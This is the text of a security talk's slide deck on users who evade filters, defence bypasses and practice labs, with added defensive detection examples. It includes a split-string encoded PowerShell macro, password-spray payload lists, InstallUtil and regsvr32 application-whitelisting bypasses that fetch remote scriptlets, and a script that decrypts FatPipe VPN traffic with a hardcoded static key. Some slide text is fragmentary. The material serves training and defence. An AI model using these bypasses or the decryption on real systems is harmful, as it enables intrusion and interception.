Users... They Click things


Granny Max 


Loves to gamble 
Likes Polka Dots 
Likes anything with 
"Polka" in it 
Thinks the CD tray is a 
coaster 
Collects Gnomes 
Bypasses your outbound web filters by using a third-party anonymizing proxy


Phil... From Accounting 


Works with numbers... and Terabytes of Porn
Has a "slight" problem


Does not get along 
with Granny Max 
Hates cats 
Bypasses your filtering by using an SSH tunnel through his home system


"Average" Users


Do not gamble... at work
Do not surf porn... at work
Likes: Facebook, YouTube, 
Politics, eBay, 
Googling, Fantasy 
football, Fark, Drudge 
Report, the Huffington 
Post, CNN, Amazon 
Dislikes: Web filters 
Quickly becoming friends with Phil and Granny Max to learn ways to bypass your filtering


The Bad Guys 


Motivated 
Can you imagine 
their HR 
department? 
Wicked skilled (more 
on this Later) 
They either own or 
infect many of the 
sites your more 
"interesting" users 
are going to 


The Bobs 


The Cloud 


The Internet is big... really big
You just won't believe how vastly, hugely, mind-bogglingly big it is...
Most of it is 
worthless.. and Evil! 
Many of your users will 
not stop clicking 
until they visit 
every site 


How do bad things happen? 


We seem to be in a loop 
A very bad loop 


Getting angry at questions... 
Best AV? 
Best DLP? 


Best Threat Intel Feed? 
Best Firewall? 


Patterns and Chiasms This 


. Without the lear 




EXPERIMENT. 


FAIL. 
LEARN. 
REPEAT. 


Password example 




Most password complexity requirements are:
• >8 Characters
• Upper/Lower/Alpha/Num
• No Dictionary words
• Full of fail
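A worked comparison added here (not from the deck) to show why the slide calls the classic rule set "full of fail": the complexity policy above accepts exactly the season-plus-year passwords a spraying list is built from, while a length-first policy with a small weak-base-word list rejects them. The sample passwords are constructed in the shape of the Intruder payload list shown later in the deck; the word list is a tiny stand-in for a real breached-password list.

```python
import re

# Constructed word list: seasons, months and the usual suspects. A real
# deployment would check against a large breached-password list instead.
WEAK_BASE_WORDS = {
    "spring", "summer", "fall", "autumn", "winter",
    "january", "february", "march", "april", "may", "june", "july",
    "august", "september", "october", "november", "december",
    "password", "welcome", "company",
}

def meets_complexity(pw):
    """The policy from the slide: more than 8 characters, upper + lower + digit,
    and the password is not itself a dictionary word."""
    return (len(pw) > 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and pw.lower() not in WEAK_BASE_WORDS)

def base_word(pw):
    """Strip digits and punctuation from both ends: 'Winter2015!!' -> 'winter'."""
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", pw.lower())

def is_predictable(pw):
    """True when the password is a weak base word padded with a year, number or
    symbol, which is exactly the shape a password-spraying list is made of."""
    return base_word(pw) in WEAK_BASE_WORDS

def meets_length_policy(pw, min_len=15):
    """Length-first policy: long passphrases pass, predictable shapes are blocked."""
    return len(pw) >= min_len and not is_predictable(pw)

def compare(passwords):
    """Return {password: (passes_complexity, passes_length_policy)}."""
    return {pw: (meets_complexity(pw), meets_length_policy(pw)) for pw in passwords}

if __name__ == "__main__":
    # Constructed samples in the shape of the deck's Intruder payload list
    samples = ["Winter15", "Winter2015", "January2016", "Password123",
               "correct horse battery staple", "Winter2015!!"]
    for pw, (cplx, length) in compare(samples).items():
        print("%-30s complexity=%-5s length_policy=%s" % (pw, cplx, length))
```

Every seasonal password that is long enough sails through the complexity check; the only thing the complexity policy rejects is "Winter15", and only because it is eight characters rather than nine. The passphrase fails complexity (no upper case, no digit) and is the only sample the length-first policy accepts.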




Truth 1
"We cannot fix this because of compliance!"
NIST Greenbook

[Table from the NIST Green Book (slide screenshot); only fragments survived extraction: the probability of guessing a password is compared for 6-month and 12-month lifetimes. The 12-month value is the MAXIMUM LIFETIME (months), rounded (rounded from 8.94; rounded down from ...).]
Cash Cow Tipping....


THEY TIPPED US IN OUR SLEEP


Bypass everything.. 
AV, DLP, Firewalls, etc. 
Trivial to do.. 
More smoke and mirrors 


Get previous sessions here: 
Tinyurl.com/504-extra 
It Won't Get Better


Mail Providers Blocking PowerShell Macros


Dear GMX Member, 


A virus was detected in a mail addressed to you: 


To prevent further damage, the concerned e-mail has been deleted. 


Cannot send message using the server Gmail 


Sending the message content to the server failed. 


The server response was: This message was blocked because its content presents a potential security issue. Please visit https://support.google.com/mail/answer/6590 to review our message content and attachment content guidelines. u202sm12936179qka.10 - gsmtp
"Obfuscate" Empire Macro


Appears to just look for "powershell" in the macro


It's a virus!!


"powershell.exe -NoP -NonI -W Hidden -Enc JAB3AEMAP"
Str + "QBOAEUAVwAtAE8AQgBKAEUAYwBOACAAUWBSAFMAdABFAEOALgB"
Str + "OAEUAdAAuAFCAZQBCAEMAbABJAGUAbgBUADSAJAB1AD0A JwBNA"


Str + "l.exe -NoP -NonI -W Hidden -Enc JAB3AEMAP"
Str + "QBOAEUAVwAtAE8AQgBKAEUAYwBOACAAUWB5AFMAdABFAEOALgB"
Str + "OAEUAdAAUAFCAZQBCAEMAbABJAGUAbgBUADSAJAB1AD0A JwBNA"
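The slides show that the mail filters match on the literal token "powershell", so splitting it across two string literals is enough to slip past. The defensive counterpart, added here as an example and not part of the deck, is to reassemble concatenated literals before matching. The VBA fragment below is constructed in the shape of the slide's macro (literal fragments joined with `+` and `&` across statements that assign to the same variable) and deliberately carries no encoded payload or launcher; the token list and the toy parser are assumptions of this example, not any mail provider's rules.

```python
import re

# Constructed VBA fragment in the shape of the slide's split-string macro.
SAMPLE_MACRO = '''
Sub AutoOpen()
    Dim Str As String
    Str = "powershe"
    Str = Str + "ll.exe -NoP -NonI -W Hidden -Enc " + "JAB3AEMAP"
    Str = Str & "QBOAEUAVwAtAE8AQgBK"
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?(\w+)\s*=\s*(.*)$', re.I)
LITERAL_RE = re.compile(r'"((?:[^"]|"")*)"')   # VBA escapes a quote as ""
SUSPECT_TOKENS = ("powershell", "-enc", "-nop", "-w hidden")

def literals_in(text):
    """All string literals in a piece of VBA, with "" unescaped to a quote."""
    return [m.group(1).replace('""', '"') for m in LITERAL_RE.finditer(text)]

def reassemble(vba_source):
    """Map each variable to the concatenation of every literal assigned to it,
    following `Str = Str + "..."` / `Str = Str & "..."` chains, so a token that
    was split across fragments becomes one contiguous string again."""
    strings = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        var, rhs = m.group(1), m.group(2)
        parts = literals_in(rhs)
        if not parts:
            continue
        # `Str = Str + ...` continues the previous value; anything else restarts it
        continues = re.match(r'\s*' + re.escape(var) + r'\s*[+&]', rhs, re.I) is not None
        if continues and var in strings:
            strings[var] += "".join(parts)
        else:
            strings[var] = "".join(parts)
    return strings

def naive_scan(vba_source):
    """What a per-literal signature check sees: each literal matched on its own."""
    found = set()
    for lit in literals_in(vba_source):
        low = lit.lower()
        found.update(t for t in SUSPECT_TOKENS if t in low)
    return sorted(found)

def reassembled_scan(vba_source):
    """The same token check, run over the reassembled per-variable strings."""
    found = set()
    for value in reassemble(vba_source).values():
        low = value.lower()
        found.update(t for t in SUSPECT_TOKENS if t in low)
    return sorted(found)

if __name__ == "__main__":
    print("per-literal :", naive_scan(SAMPLE_MACRO))
    print("reassembled :", reassembled_scan(SAMPLE_MACRO))
```

The per-literal scan still sees the `-NoP` / `-Enc` / `-W Hidden` switches (they sit inside one fragment), which is a reminder that matching on the launch flags is more robust than matching on the binary name; only the reassembled scan recovers "powershell". The same normalisation idea extends to `Chr()` and `StrReverse()` tricks, which this toy parser does not handle.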


Do you run any of these? 


[Screenshot of a captured login POST in Burp: a Firefox/Gecko User-Agent, Accept-Language, Accept-Encoding: gzip, Referer, Cookie, Connection: close, Content-Type: application/x-www-form-urlencoded, Content-Length: 162; the form body carries the username and password fields, with the password set to Testing123.]


Redirections 


These settings control how Burp handles redirections when performing attacks. 


Follow redirections: Never / On-site only (selected) / In-scope only / Always

Process cookies in redirections


Payload Options [Simple list] 


This payload type lets you configure a simple list of strings tk 


Paste
Winter15
Winter16
Fall2015
January2016
January16
December2015
Password123
Winter123
Winter2015
Winter 20156


Remove 


Clear 


[Intruder results table: columns Request, Payload, Redir., Timeout, Length, Comment, with response lengths 6857, 1630, 15062, 76 and 222. Annotations on the screenshot: "UserID's Successful Login" and "4-7 Failed Login". Tabs: Response 1 ... Response 3 | Request 4 | Response 4 | Request 5 | Response ...]
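The Intruder run above is a password spray: one seasonal password tried against a list of user IDs, so no account ever reaches a lockout threshold. The detection logic below is an added example (not from the deck or from Burp) that finds that shape in authentication records: many distinct accounts failing from one source with only a few tries each, and any successful logon from that source once the spraying started. The log lines are constructed, with Windows event IDs 4625/4624 as the failed/successful logon markers; the field layout and thresholds are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed authentication records (4625 = failed logon, 4624 = successful
# logon), reduced to the fields the check needs. 203.0.113.9 sprays one
# password across five accounts and gets in as erin; 198.51.100.7 hammers
# one account (brute force, not a spray); 192.0.2.5 is a user's own typo.
SAMPLE_LOG = """\
2016-01-12T08:00:01 4625 user=alice src=203.0.113.9
2016-01-12T08:00:02 4625 user=bob src=203.0.113.9
2016-01-12T08:00:03 4625 user=carol src=203.0.113.9
2016-01-12T08:00:04 4625 user=dave src=203.0.113.9
2016-01-12T08:00:05 4625 user=frank src=203.0.113.9
2016-01-12T08:00:09 4624 user=erin src=203.0.113.9
2016-01-12T08:30:00 4625 user=frank src=198.51.100.7
2016-01-12T08:30:05 4625 user=frank src=198.51.100.7
2016-01-12T08:30:10 4625 user=frank src=198.51.100.7
2016-01-12T08:30:15 4625 user=frank src=198.51.100.7
2016-01-12T08:30:20 4625 user=frank src=198.51.100.7
2016-01-12T09:00:00 4625 user=gina src=192.0.2.5
2016-01-12T09:05:00 4624 user=gina src=192.0.2.5
"""

EVENT_RE = re.compile(r"^(\S+) (\d{4}) user=(\S+) src=(\S+)")

def parse_events(text):
    """Return [(timestamp, event_id, user, src)] for every well-formed line."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if m:
            ts, eid, user, src = m.groups()
            events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
                           int(eid), user.lower(), src))
    return events

def detect_spray(events, min_accounts=5, max_per_account=3, window_seconds=3600):
    """Flag sources that fail against many distinct accounts with only a few
    tries each inside the window. Few tries per account is what separates a
    spray (one password, every user) from a brute force (one user, many
    passwords), and is why per-account lockout alone never trips."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, eid, user, src in events:
        if eid == 4625:
            failures[src].append((ts, user))
        elif eid == 4624:
            successes[src].append((ts, user))
    hits = {}
    for src, fails in failures.items():
        per_user = defaultdict(int)
        for _, user in fails:
            per_user[user] += 1
        times = [t for t, _ in fails]
        span = (max(times) - min(times)).total_seconds()
        if (len(per_user) >= min_accounts
                and max(per_user.values()) <= max_per_account
                and span <= window_seconds):
            hits[src] = {
                "distinct_users": len(per_user),
                "failures": len(fails),
                # accounts that logged in from the spraying source after it
                # started: the sprayed password worked for these
                "success_after": sorted({u for t, u in successes[src] if t >= min(times)}),
            }
    return hits

if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(src, info)
```

The brute-force source is not reported by this check (one account, five tries) and the typo is far below the account threshold; only the spraying source is returned, together with the account it compromised. In a real environment the source field may be a workstation name rather than an IP, and sprays spread over days need a longer window and a lower per-hour rate.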


InstallUtil-ShellCode.cs 


• @subTee (Casey Smith) is awesome
• Please, take a moment and follow
• By pulling down InstallUtil-ShellCode.cs and inserting msfvenom (-f csharp) into it
• Compile with the csc.exe tool
• Awesome! Because it does not need a full Visual Studio Environment
• Walkthrough here:
  ° http://www.blackhillsinfosec.com/?p=24881
• @subTee here:
  ° http://subt0x10.blogspot.com/?m=1


InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe


[Screenshot of InstallUtil-ShellCode.cs; only fragments survived extraction:]
class Program
    Console.WriteLine(...);
    //Add any behaviour here to throw off sandbox execution/analysts :)

[System....]
class Sample : System....Install...
    //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
    ... override void Uninstall(System.Collections.IDictionary savedState)
        Shellcode.Exec();


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <!-- License: BSD3-Clause -->

<script language="JScript">
<![CDATA[

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll 


Yea, regsvr32 can take a URL
It is proxy aware
Uses TLS
Is a signed MS binary..
http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html?m=1
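The properties the slide lists (a signed Microsoft binary that fetches a scriptlet over HTTP and runs it through scrobj.dll) are also what make this easy to spot in process-creation telemetry. The triage function below is an added example, not from the deck or from any product: it inspects (parent image, image, command line) records in the shape of Sysmon Event ID 1 and returns the reasons a regsvr32 launch deserves attention. The sample records are constructed (record 1 reuses the slide's command line); the parent-process list is an assumption.

```python
import re

# Constructed process-creation records (parent image, image, command line),
# in the shape of Sysmon Event ID 1 fields. Record 1 is the command line from
# the slide; the others are ordinary COM registrations.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",
     r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'),
    (r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /u legit.dll"),
]

URL_ARG_RE = re.compile(r"/i:\s*https?://", re.I)
# Assumed: document-handling parents that have no business spawning regsvr32.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def inspect_regsvr32(parent_image, image, command_line):
    """Return the list of reasons this regsvr32 execution deserves an analyst's
    attention (empty list = nothing matched). Each reason maps to one of the
    behaviours the slide describes."""
    reasons = []
    if not image.lower().endswith("regsvr32.exe"):
        return reasons
    low = command_line.lower()
    tokens = low.split()
    if URL_ARG_RE.search(command_line):
        reasons.append("/i: install argument is a URL")
    if "scrobj.dll" in low:
        reasons.append("scrobj.dll named: scriptlet execution, not a real COM DLL")
    if "/n" in tokens and any(t.startswith("/i:") for t in tokens):
        reasons.append("/n with /i: skips DllRegisterServer and only runs the install entry point")
    if parent_image.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return reasons

def triage(events):
    """(index, reasons) for every record that drew at least one reason."""
    out = []
    for i, event in enumerate(events):
        reasons = inspect_regsvr32(*event)
        if reasons:
            out.append((i, reasons))
    return out

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i][2])
        for r in reasons:
            print("   -", r)
```

Command-line matching is the cheap first pass; because the slide notes regsvr32 is proxy aware, the same event should also be correlated with the proxy log entry for the .sct fetch, and the mitigation the deck itself points at (AppLocker/SRP rules that cover regsvr32 and the other signed script hosts) removes the need to win the detection race at all.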


Moving forward 


AV, DLP, Firewalls, Threat Intelligence Feeds, 
Cyber Kill-Chain 


Let's leave those old things behind


If we started all over again, how would we do it?


There is a lot of baggage over the years... 
Time to let that go too. 


This is all based on our testing and training 
Same loops, same patterns 


Attacking a VPN 


FatPipe
• Found by Joff Thyer
• They have not responded in months...


LDAP Authenticati...


• Problem with key reuse
• If the same key is used... for all installations
• I can steal that key
• And decrypt on the fly
Bruce Cries...

[Decompiled Java from the client (screenshot); identifiers lost in extraction are shown as ...]

public void firstTimeRead(int paramInt)
  ...[paramInt] = false;
  byte[] arrayOfByte1 = new byte[...];
  this....read(arrayOfByte1, 0, arrayOfByte1.length);
  ... (i != -1) {
    byte[] arrayOfByte2 = new byte[i];
    System.arraycopy(arrayOfByte1, 0, arrayOfByte2, 0, i);
    ... = Twofish_Algorithm.makeKey(....getBytes());
    byte[] arrayOfByte3 = CRYPT.getDecryptedBytes(arrayOfByte2, ...);
    byte[] arrayOfByte4 = new byte[16];
    System.arraycopy(arrayOfByte3, 0, arrayOfByte4, ...
    this....[0] = new String(arrayOfByte4);
    ... = Twofish_Algorithm.makeKey(this....[0].getBytes());
  catch (Exception localException) {
    localException.printStackTrace();
ALL BLOCKS
ARE EQUAL
Quick!! To Python!

# Python 2 (str.decode('hex'), print statement), as on the slide
import struct
from twofish import Twofish

static_key = '816D5BD0FAE35342'

init_key = 'e12fd69b1f0bed397a187a1c1953f552'.decode('hex')
# Captured client/server blocks (cblock1, sblock1, ... in the decrypt calls
# below); the variable names on the left of these lines were lost in extraction.
'3ec107c388dc30c851a3d64db4f879dd'.decode('hex')
'f4a9a41e04d37c72be4d3f168944840e'.decode('hex')
'57d52b8806794c48506a95e15b877376'.decode('hex')
'72f2aed8c2e14b6769c7f7da4a9f5d44'.decode('hex')
'143771c314f7079b1f7e9d7c48549d42'.decode('hex')
'536fb4cec74c3f332e44b31dc7fc558d'.decode('hex')
'dabf359b9269cbc7a4958897fbc6b635'.decode('hex')
'24ab42d42adf2c76a9dcd48ffbaa555e'.decode('hex')
'218b846d334d8e12827eb30a36e2bd6cb'.decode('hex')

tf1 = Twofish(static_key)
tf1.decrypt(init_key)  # this result seeds tf2; the assignment was lost in extraction

tf3 = Twofish(tf2.decrypt(sblock1))
tf4 = Twofish(tf3.decrypt(sblock3))

print 'Client: ' + tf2.decrypt(cblock1)
print 'Server: ' + tf2.decrypt(sblock2)
print 'Client: ' + tf3.decrypt(cblock2)
print 'Server: ' + tf3.decrypt(sblock4)
print 'Client: ' + tf4.decrypt(cblock3)
print 'Server: ' + tf4.decrypt(sblock6)
Results!!

$ python ./fatpipe_decrypt.py
Client: 0
Server:
Client:
Server:
Client:
Server:
#2|5.2.2r10
3|aaaa
#4
5|aaaa|0
861010111019
• Exploits are not always buffer/heap overflows
• We need to look deeper into the logic of things.
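The FatPipe slides ("ALL BLOCKS ARE EQUAL", a key shared by every installation) describe a logic flaw rather than a memory bug, and it is one an assessor can check for from captures alone. The block below is a worked check added here, not from the deck: it splits ciphertext captures from several installations into 16-byte blocks (the Twofish block size) and reports blocks that recur across captures, which only happens when the same key is used with a deterministic mode. The captures are constructed with a deterministic stand-in for a block cipher (a hash of key and block, labelled as such; it is not Twofish and cannot decrypt anything); the 16-byte static key string is the one shown in the deck.

```python
import hashlib
import os
from collections import defaultdict

BLOCK = 16                          # Twofish block size in bytes
STATIC_KEY = b"816D5BD0FAE35342"    # the 16-byte static key shown in the deck

def blocks(data, size=BLOCK):
    """Split data into full-size blocks (a trailing partial block is dropped)."""
    return [data[i:i + size] for i in range(0, len(data) - len(data) % size, size)]

def toy_block_encrypt(key, data):
    """Stand-in for a block cipher in a deterministic (ECB-style) mode: every
    output block depends only on (key, block), so equal plaintext blocks under
    the same key give equal ciphertext blocks. NOT Twofish, not invertible;
    it exists only to produce realistic-looking captures offline."""
    return b"".join(hashlib.sha256(key + b).digest()[:16] for b in blocks(data))

def repeated_blocks(captures, size=BLOCK):
    """captures: {label: ciphertext} from different sessions or installations.
    Returns {block_hex: [labels]} for every ciphertext block seen in more than
    one capture. Cross-capture repeats mean one key plus a deterministic mode:
    whoever learns one plaintext (or the key) learns it for every installation."""
    seen = defaultdict(set)
    for label, data in captures.items():
        for b in blocks(data, size):
            seen[b.hex()].add(label)
    return {h: sorted(labels) for h, labels in seen.items() if len(labels) > 1}

def session_plaintext(i):
    # Constructed: two fixed blocks (what every installation sends) plus one
    # block that differs per session.
    return (b"LOGIN aaaa      " + b"PASS aaaa       "
            + ("SESSION %d" % i).ljust(16).encode())

def demo_static_key():
    """Three installations, one shared static key: the fixed blocks collide."""
    caps = {"install%d" % i: toy_block_encrypt(STATIC_KEY, session_plaintext(i))
            for i in (1, 2, 3)}
    return repeated_blocks(caps)

def demo_per_session_key():
    """Same traffic, but each session uses its own random key, standing in for
    the output of a real key exchange: nothing is shared across captures."""
    caps = {}
    for i in (1, 2, 3):
        session_key = os.urandom(16)
        caps["install%d" % i] = toy_block_encrypt(session_key, session_plaintext(i))
    return repeated_blocks(caps)

if __name__ == "__main__":
    print("static key, blocks shared across installs:", demo_static_key())
    print("per-session key, blocks shared           :", demo_per_session_key())
```

With the shared static key the two fixed blocks (the login and password blocks) show up identically in all three captures, which is the pattern the slide title describes; with a per-session key nothing recurs. A per-session key alone is still not a complete design (the same block would still repeat within a session), so the fix a vendor should ship is an authenticated mode with a random nonce on top of a proper key exchange.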


SDR.. Is Awesome!
[Spectrum plot, x-axis: Frequency (MHz)]
300/315/390 MHz $77
But Can Be frustrating..
Stealing your garage door opener...


[GNU Radio "Top Block" spectrum window reading 313.000, x-axis: Frequency (MHz)]
WAV to bin..

Partial...

#!/usr/bin/python
# This file reads an input file from gnuradio that contains a
# digital baseband waveform and prints the bits contained in its
# payload. The end of the preamble for each transmission is marked
# by gnuradio with a value of 2 or 3. All other values will be 1 or
# 0.

import io
import sys
from struct import *

payloadLength = 92
waveformFileName = "ook.bin"

# open input file for read access in binary mode
waveformFile = io.open(waveformFileName, 'rb')
# read file contents to a list
waveformData = list(waveformFile.read())
# close the file
waveformFile.close()
• Security is moving on
• Not just OS and Web security
Sto


New Fundamental


App Locker and SRP
Long Passwords
Two Factor Auth
Firewall Everything
Internet Whitelisting
Regularly Test Things

Assume you will be compromised.. Plan Accordingly!!!!


THERE'S A POINT WHERE 
THIS NEEDS TO STOP 
AND 
WE'VE 
CLEARLY CROSSED IT 


Let's Practice!


Administrator: Command Prompt - 504lab-32bit.exe

C:\Tools>504lab-32bit.exe
A TCP Backdoor has been started on your host. Without connecting to it identify it and answer the following questions.
What TCP port is the backdoor listening on? 63864
What is the process id number of the backdoor? 2708
What is the Parent process id number of the backdoor? 2280
Use netcat to connect to the backdoors TCP port.
What is flag printed when you connect to the backdoor? TheFlagisBlackó68685
1118
This powershell backdoor was easy to find because it listened on a TCP por
Now I'm creating a new powershell process that does not.
What is the process id number of the backdoor?


Thanks To Mark Baggett! 
More! More Practice!

[Internal test report table (screenshot); rows as far as they can be recovered]
Test | Date | Pass/Fail | Notes
Command line access via a shortcut (.lnk file) | 8/18/2014 | fail | cmd.exe access was restricted, could be created
(test name lost in extraction) | | fail | Malware executed with no AV alerts and resulted in a successful two-way connection back to BHIS's server.
Custom malware - VSAgent | 8/18/2014 | fail | Malware executed with no AV alerts and resulted in a successful two-way connection back to BHIS's server. Request Modification Required
ASCII shellcode injection malware - Metasploit, PyInjector, PowerSploit | 8/18/2014 | | AV didn't catch / Egress filtering prevented she...
... malware EXE - Metasploit | 8/18/2014 | | AV didn't catch / Egress filtering prevented she...
(test name lost in extraction) | 8/18/2014 | | AV didn't catch / Egress filtering prevented she...
Plaintext credit card number data exfiltration | | | Web application whitelisting prevents 'traditional' exfiltration methods
C2 detection: HTTP viewstate covert channel - VSAgent | 8/18/2014 | pass | ... filter prevented callback communication
Reverse TCP port 443 Meterpreter channel - Metasploit | 8/18/2014 | pass | ... filter prevented callback communication
Non-standard TCP channels - Metasploit | 8/18/2014 | | All ports tested except 53 did not allow non-proxied communication
Want this?


And other things.... 


http://tinyurl.com/504-extra
A note on architecture


Thanks for attending! 


• John Strand
INSTANT ANTIDEPRESSANT.
- @strandjs
Puppies Make It All Better